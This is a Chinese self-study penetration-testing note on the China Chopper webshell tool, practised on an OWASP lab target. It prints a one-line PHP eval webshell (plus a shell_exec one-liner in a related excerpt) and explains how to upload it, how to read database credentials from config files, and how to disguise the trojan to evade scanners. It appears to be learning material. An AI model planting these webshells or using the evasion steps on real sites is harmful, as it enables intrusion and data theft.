自学渗透第四天–中国菜刀

一、如何使用
中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。
(1)首先将一句话木马上传至网站后台。

(2)运行该文件,确认文件上传成功。

(3)复制该链接到中国菜刀,并输入相应的密码。

(4)成功获取网站shell。

二、常用功能
1、上传本地文件到网站后台。

2、下载在线文件至网站后台。
将欲下载的文件链接添加至下载框即可

由于某些网站的特殊权限限制,可能会禁止本地上传文件,故通过下载将文件上传至网站后台更为通用。

3、将后台文件下载到本地。
小文件可以直接使用菜刀进行下载,但若需要下载较大文,则推荐使用浏览器或迅雷进行下载
(1)通过菜刀获取其在网站后台的相对位置(注意:是相对路径)
(2)在浏览器输入相应的下载地址,本网站是相对/www目录:

(3)右键下载

4、后门
通过修改木马文件的名称,时间,大小等即可增加木马文件的不可辨识度。常见的杀马工具有D盾等。

5、数据库管理
首先通过文件管理寻找该网站数据库配置文件,一般名称为config。

打开该文件即可获取其数据库的相关信息:

然后对菜刀的数据库管理工具进行相应配置:

即可连接至数据库
注意:非合法授权下的某些数据库操作将会构成违法犯罪,请谨慎使用,遵法守法人人有责!
本学习笔记仅供学习交流,请勿利用本笔记从事任何违法犯罪行为。

自学渗透第四天--中国菜刀相关推荐

  1. 上传渗透----中国菜刀和kali的使用(安全攻防)

    本文章仅供实验参考 1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2 下载地址 我们还需要中国菜刀和kali这两个工具,把所有的杀毒软件关了,不然中国菜刀可能会被杀毒软 ...

  2. 简评黑客利器——中国菜刀

    来源:http://edu2b.sinaapp.com/?p=236&replytocom=17 作者:XXX 我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的 ...

  3. WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用

    一.Webshell的作用 (1)一方面,webshell被站长常常用于网站管理.服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本.上传下载文件.查看数据库.执行任意程序命令等. (2)另 ...

  4. 【webshell管理工具之一】中国菜刀

    一.webshell管理工具的起源 说起webshell管理工具,必须先来看一段代码 <?php echo shell_exec($_GET['cmd']);?> 这段一句话代码可以说是最 ...

  5. 技术剖析中国菜刀原理

    用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵 这货就是主界面,环境啥的就随意了,IIS,阿 ...

  6. 中国菜刀远程webshell管理工具

    我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的技术和经验也不断提高,在渗透过程中收集了大大小小的工具一堆,都快把自己的U盘放满了,当然,随着时代和技术的进步,很多工具 ...

  7. 【转载】简评黑客利器——中国菜刀

    # 鬼仔:这篇文章是一个朋友写的,但是他不让说他是谁,就替他保密一下了.这篇文章看起来很像软文,但是文章中介绍的还挺详细,不要把他当成软文来读就行了.作者:XXX 我是一个玩黑很多年的人,入侵了大大小 ...

  8. 为什么喧闹过后,京东还是市值第四的中国互联网公司?

    根据1月10日最新的中国互联网公司市值排行,中国互联网行业BATJ的格局没有丝毫改变,京东以341亿美元市值排名第四,这一数字和第三名百度的580亿美元市值相比,差距并不大. 在2018年,京东的市值 ...

  9. webshell管理之中国菜刀 蚁剑 WeBaCoo Weevely

    一:中国菜刀 中国菜刀是一款国产的网站管理软件,直接php,asp,aspx等脚本语言,简单来说通过菜刀连接上传到网站的一句话木马,可以控制 部分甚至全部权限,现在很多菜刀都有后门,小心使用. 一般情 ...

最新文章

  1. Oracle 11.2.0.4 x64 RAC扩展存储空间
  2. Win7 64位的SSDTHOOK(1)---SSDT表的寻找
  3. 如果我们能够数字化,那么我们能够give away
  4. boost::statechart模块实现状态迭代测试
  5. 我与TCP连接不得不说的故事
  6. 数据结构与算法(C#版)第二章 C#语言与面向对象技术(下)V1.0
  7. linuxpgrepgrep_linux命令:ps pstree pgrep pidof进程管理
  8. 我的docker随笔16:构建一个特定的nodejs镜像
  9. Arturia V Collection 8 for mac - Arturia系列合成器插件大合集
  10. 利用PIL将图像处理为黑白和灰色图片
  11. 拆解ONES,从ONES深挖项目研发管理机制
  12. C语言判断一个数是奇数还是偶数
  13. 如何观看网页flash视频以及下载视频
  14. 计算机视觉笔记及资料整理(含图像分割、目标检测)
  15. 使用粒子效果动画组成模型[自定义shader实现]
  16. mac发送微信表情卡顿(已解决!!!!)
  17. Hadoop 调优之Linux操作系统调优篇
  18. 计算机网络共经历了四代,计算机经历了四代的发展,其中第三代计算机的主要组成部件是...
  19. 计算机硬件报警声音,有关电脑发出警报声的.
  20. 2022暑期学校C++课程设计课题

热门文章

  1. 用Python进行身份证号校验
  2. JavaScript-牛客网-剑指offer(1-10)题解
  3. 一条线 理解SSH登录前因后果
  4. echarts中的地图与Axure交互
  5. RSA加密超长数据 前端js 作为参考
  6. 腾讯会议突围背后:端到端实时语音技术是如何保障交流通畅的?
  7. L2-4 彩虹瓶 (25 分)-2019天梯赛全国总决赛
  8. C++:在查找预编译头时遇到意外的文件结尾。是否忘记了向源中添加 “#include “stdafx.h“”?
  9. 邵柏庆与Ace Lead Profits Ltd.在英属维尔京群岛针对和利时自动化科技有限公司提起诉讼
  10. 日期解析:2021-05-15T23:30:00+08:00